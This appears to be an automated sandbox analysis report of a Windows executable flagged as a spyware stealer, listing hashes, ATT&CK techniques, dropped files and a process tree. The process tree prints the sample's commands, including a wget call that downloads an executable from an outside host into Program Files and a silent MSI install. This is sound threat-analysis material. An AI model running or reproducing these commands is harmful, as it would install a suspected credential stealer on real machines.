01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26

Analysis

max time kernel
106s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
19-09-2022 12:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
Size

626KB
MD5

123dbc5d23301b384f8796fe9ab2f278
SHA1

38271921f6fc9a3dbd75224670f9603ab1248d73
SHA256

01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26
SHA512

ec16ef0b83c591b73b4b907ae71511134c9d9d80a646f6c0187e8da21c226378e90285466f2094e0f7a8d795e17eeb2b97915a480826efec698c5aaf8c8b6a34
SSDEEP

6144:+txgWaPErW1civwXSBxl7ju04CfOf/3ix/YheJvm3WeFAiAuzCe8JikKN0Y4RqCV:kGWgvxl7yC2nixMeJqLFPOikKad1KOl

Score

8^/10

spyware stealer

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3700	wget.exe
3500	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
804	MsiExec.exe
804	MsiExec.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	cmd.exe
File opened (read-only)	\??\J:	cmd.exe
File opened (read-only)	\??\L:	cmd.exe
File opened (read-only)	\??\P:	cmd.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	cmd.exe
File opened (read-only)	\??\V:	cmd.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\B:	cmd.exe
File opened (read-only)	\??\K:	cmd.exe
File opened (read-only)	\??\T:	cmd.exe
File opened (read-only)	\??\X:	cmd.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\M:	cmd.exe
File opened (read-only)	\??\U:	cmd.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\F:	cmd.exe
File opened (read-only)	\??\O:	cmd.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\G:	cmd.exe
File opened (read-only)	\??\W:	cmd.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\H:	cmd.exe
File opened (read-only)	\??\R:	cmd.exe
File opened (read-only)	\??\Y:	cmd.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\N:	cmd.exe
File opened (read-only)	\??\Q:	cmd.exe
File opened (read-only)	\??\S:	cmd.exe
File opened (read-only)	\??\Z:	cmd.exe
File opened (read-only)	\??\M:	msiexec.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\Program Files\Common Files\pipi_dae_484.exe	wget.exe
File created	C:\Program Files (x86)\Your Company\Your Application\ .txt	msiexec.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e56d101.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID268.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID538.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSID97E.tmp	msiexec.exe
File created	C:\Windows\Installer\e56d101.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C21911F7-A2B3-4D84-8C57-555CF73DFB48}	msiexec.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1F	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1E\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1f	msiexec.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1788	PING.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3092	msiexec.exe
3092	msiexec.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3500	cmd.exe
Token: SeIncreaseQuotaPrivilege	3500	cmd.exe
Token: SeSecurityPrivilege	3092	msiexec.exe
Token: SeCreateTokenPrivilege	3500	cmd.exe
Token: SeAssignPrimaryTokenPrivilege	3500	cmd.exe
Token: SeLockMemoryPrivilege	3500	cmd.exe
Token: SeIncreaseQuotaPrivilege	3500	cmd.exe
Token: SeMachineAccountPrivilege	3500	cmd.exe
Token: SeTcbPrivilege	3500	cmd.exe
Token: SeSecurityPrivilege	3500	cmd.exe
Token: SeTakeOwnershipPrivilege	3500	cmd.exe
Token: SeLoadDriverPrivilege	3500	cmd.exe
Token: SeSystemProfilePrivilege	3500	cmd.exe
Token: SeSystemtimePrivilege	3500	cmd.exe
Token: SeProfSingleProcessPrivilege	3500	cmd.exe
Token: SeIncBasePriorityPrivilege	3500	cmd.exe
Token: SeCreatePagefilePrivilege	3500	cmd.exe
Token: SeCreatePermanentPrivilege	3500	cmd.exe
Token: SeBackupPrivilege	3500	cmd.exe
Token: SeRestorePrivilege	3500	cmd.exe
Token: SeShutdownPrivilege	3500	cmd.exe
Token: SeDebugPrivilege	3500	cmd.exe
Token: SeAuditPrivilege	3500	cmd.exe
Token: SeSystemEnvironmentPrivilege	3500	cmd.exe
Token: SeChangeNotifyPrivilege	3500	cmd.exe
Token: SeRemoteShutdownPrivilege	3500	cmd.exe
Token: SeUndockPrivilege	3500	cmd.exe
Token: SeSyncAgentPrivilege	3500	cmd.exe
Token: SeEnableDelegationPrivilege	3500	cmd.exe
Token: SeManageVolumePrivilege	3500	cmd.exe
Token: SeImpersonatePrivilege	3500	cmd.exe
Token: SeCreateGlobalPrivilege	3500	cmd.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe
Token: SeRestorePrivilege	3092	msiexec.exe
Token: SeTakeOwnershipPrivilege	3092	msiexec.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 2368	1648	01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe	84
PID 1648 wrote to memory of 2368	1648	01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe	84
PID 1648 wrote to memory of 2368	1648	01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe	84
PID 2368 wrote to memory of 3700	2368	cmd.exe	86
PID 2368 wrote to memory of 3700	2368	cmd.exe	86
PID 2368 wrote to memory of 3700	2368	cmd.exe	86
PID 2368 wrote to memory of 3500	2368	cmd.exe	87
PID 2368 wrote to memory of 3500	2368	cmd.exe	87
PID 2368 wrote to memory of 3500	2368	cmd.exe	87
PID 3092 wrote to memory of 804	3092	msiexec.exe	90
PID 3092 wrote to memory of 804	3092	msiexec.exe	90
PID 3092 wrote to memory of 804	3092	msiexec.exe	90
PID 2368 wrote to memory of 1788	2368	cmd.exe	93
PID 2368 wrote to memory of 1788	2368	cmd.exe	93
PID 2368 wrote to memory of 1788	2368	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe
"C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~C122.bat "C:\Users\Admin\AppData\Local\Temp\01955fac3fc219bb9e9863e5e4c5960c6c8c9fad590c20c4eba837c412a1cb26.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Users\Admin\AppData\Local\wget.exe
    "C:\Users\Admin\AppData\Local\wget.exe" http://dl.pipi.cn/pipi_dae_484.exe -O "C:\Program Files\Common Files\pipi_dae_484.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    PID:3700
- - C:\Users\Admin\AppData\Local\cmd.exe
    "C:\Users\Admin\AppData\Local\cmd.exe" /i "C:\Users\Admin\AppData\Local\9pipi.ini" /quiet
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of AdjustPrivilegeToken
    PID:3500
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - Runs ping.exe
    PID:1788

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3092
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 749375500B2C2001C282E25029E2B1E5
  2⤵
  - Loads dropped DLL
  PID:804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\9pipi.ini

Filesize
227KB

MD5
aaa7da2ac3db6912eb76a213a0da27bc

SHA1
1900552113d9b9d99e5160e8b4bdf1f5922a50a5

SHA256
007c888ab92ded5de5ec53a276c7e8c3b048fc5bcd647fc56b7b7ed96920c1f6

SHA512
adac0d9ed4f2ecc7cb5cc111ee63d0189cdd9aa447b343b69072d6fdb4db8bbb167ed513a21518c0538d8d62ddcf25db6c62546b9c575398e5c35fec2a9d9fb2

Download Submit
C:\Users\Admin\AppData\Local\9pipi.ini

Filesize
227KB

MD5
aaa7da2ac3db6912eb76a213a0da27bc

SHA1
1900552113d9b9d99e5160e8b4bdf1f5922a50a5

SHA256
007c888ab92ded5de5ec53a276c7e8c3b048fc5bcd647fc56b7b7ed96920c1f6

SHA512
adac0d9ed4f2ecc7cb5cc111ee63d0189cdd9aa447b343b69072d6fdb4db8bbb167ed513a21518c0538d8d62ddcf25db6c62546b9c575398e5c35fec2a9d9fb2

Download Submit
C:\Users\Admin\AppData\Local\Temp\MSI6da96.LOG

Filesize
650B

MD5
4924a3028090a80addbdedcea6ee7ba3

SHA1
53944f1900bc7dcf3b43b117e5a11affcfe793cb

SHA256
dd0ea2e10a170157f6e94db7f2926f8a9c7041a6a479a6830b57b6c333b4ccfc

SHA512
739023e51a59c71f374e9c44ad895ffe7e3e12664faf946ef52acf11f8f24378d1d1932919b1ab0842d596ebb84cdc3a2716e41dc26b3295671ed1dda6565d37

Download Submit
C:\Users\Admin\AppData\Local\Temp\~C122.bat

Filesize
309B

MD5
a167cf2a3d0c4ae66d94d56fdfdd07d5

SHA1
f5446d546aaf51d803b6c7cd86985619953317ac

SHA256
bb74012d828ac25079e3b132be116ea702b5fc225c946a2f4294ebeea2a38fed

SHA512
9b48cd34bfea72c362d0cf8999383553a54c2cdbf41ddd52aa8e599d1ed999fef58695fda841d14180893006425c36233ed9b9e1ac2a4d3cef7bc7112748f7f2

Download Submit
C:\Users\Admin\AppData\Local\cmd.exe

Filesize
77KB

MD5
6c985ebcd34f92d666b365b28272195f

SHA1
03b8d4cf8171b650ed68efc3c41258878c35d433

SHA256
a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99

SHA512
c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70

Download Submit
C:\Users\Admin\AppData\Local\cmd.exe

Filesize
77KB

MD5
6c985ebcd34f92d666b365b28272195f

SHA1
03b8d4cf8171b650ed68efc3c41258878c35d433

SHA256
a49ba96ce00aa92df7291454208637538af31c6df4dfc268c1dd8463a0d65c99

SHA512
c8879889fdc80caa97445e1b5e716ae6e5223fd06634d1957cf7da20c1aefe866e45513e8ce6adf2ddc396702ac720f0f56f961051053c7980a426c3da090f70

Download Submit
C:\Users\Admin\AppData\Local\wget.exe

Filesize
248KB

MD5
9ba065cdd2ef00f38eacde05d6606563

SHA1
a5a1d20bb1456bcbefc689f16f38b0710259b414

SHA256
0f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef

SHA512
3f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262

Download Submit
C:\Users\Admin\AppData\Local\wget.exe

Filesize
248KB

MD5
9ba065cdd2ef00f38eacde05d6606563

SHA1
a5a1d20bb1456bcbefc689f16f38b0710259b414

SHA256
0f18a55c0c3c386291aaf61a82f21486f9c5f0d83a78f7702b91eec841410fef

SHA512
3f302d33ec25c89e8bea581f9de1ae1409cb6b35bf6a27939b1461ea32954e5424546c0cfe2428ff850f4b962ae2cd86f090c8d45935b0c0bd5b9ba91ed0b262

Download Submit
C:\Windows\Installer\MSID268.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
C:\Windows\Installer\MSID268.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
C:\Windows\Installer\MSID538.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit
C:\Windows\Installer\MSID538.tmp

Filesize
48KB

MD5
9067aad412defc0d2888479609041392

SHA1
36cfffc3bafeb24f88ad5886ca5787ca008b6ba9

SHA256
99f4e00b6908057a2fe5067ff6c8b6e32b5c07558ab79139dc4b998f1da4b517

SHA512
e69f259d78b02e6c1a5d9c45898b59372329a5288fff655dd741353f112b2b8eed18b01caa2bf312a91f5e314e1c0b036321b37c8efbebdcf3650ba6b12dee6a

Download Submit